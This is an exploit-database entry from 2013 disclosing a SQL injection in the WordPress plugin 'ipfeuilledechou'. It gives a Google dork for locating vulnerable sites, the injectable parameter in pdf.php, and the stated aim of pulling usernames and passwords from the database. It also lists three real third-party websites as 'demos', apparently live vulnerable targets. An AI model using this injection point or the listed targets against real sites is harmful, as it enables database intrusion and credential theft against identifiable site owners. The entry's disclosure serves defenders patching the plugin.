Wordpress plugin ipfeuilledechou SQL Injection Vulnerability

2013-01-20T00:00:00
ID 1337DAY-ID-20206
Type zdt
Reporter Zikou-16
Modified 2013-01-20T00:00:00

Description

The attacker can access to the database & get username & password

                                        
                                            -------------------------------------------------------------------
Wordpress plugins - ipfeuilledechou SQL Injection Vulnerability 
-------------------------------------------------------------------
 
#####
# Author => Zikou-16
# E-mail => [email protected]
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"/wp-content/plugins/ipfeuilledechou/"
# Tested on : Windows 7 , Backtrack 5r3
####
 
#=> Exploit Info :
------------------
# The attacker can access to the database & get username & password
------------------

#=> SQL Injection 

http://[target]/[path]wp-content/plugins/ipfeuilledechou/pdf.php?id=25'[inj3ct h3re]

------------------------------

#=> Demos :
 
http://www.ps76.fr/wp-content/plugins/ipfeuilledechou/pdf.php?id=25

http://christophebouillon.fr/wp-content/plugins/ipfeuilledechou/pdf.php?id=13

http://www.nicolasrouly.fr/wp-content/plugins/ipfeuilledechou/pdf.php?id=32

------------------------------ <= Th3 End ^_^'

#  0day.today [2018-04-03]  #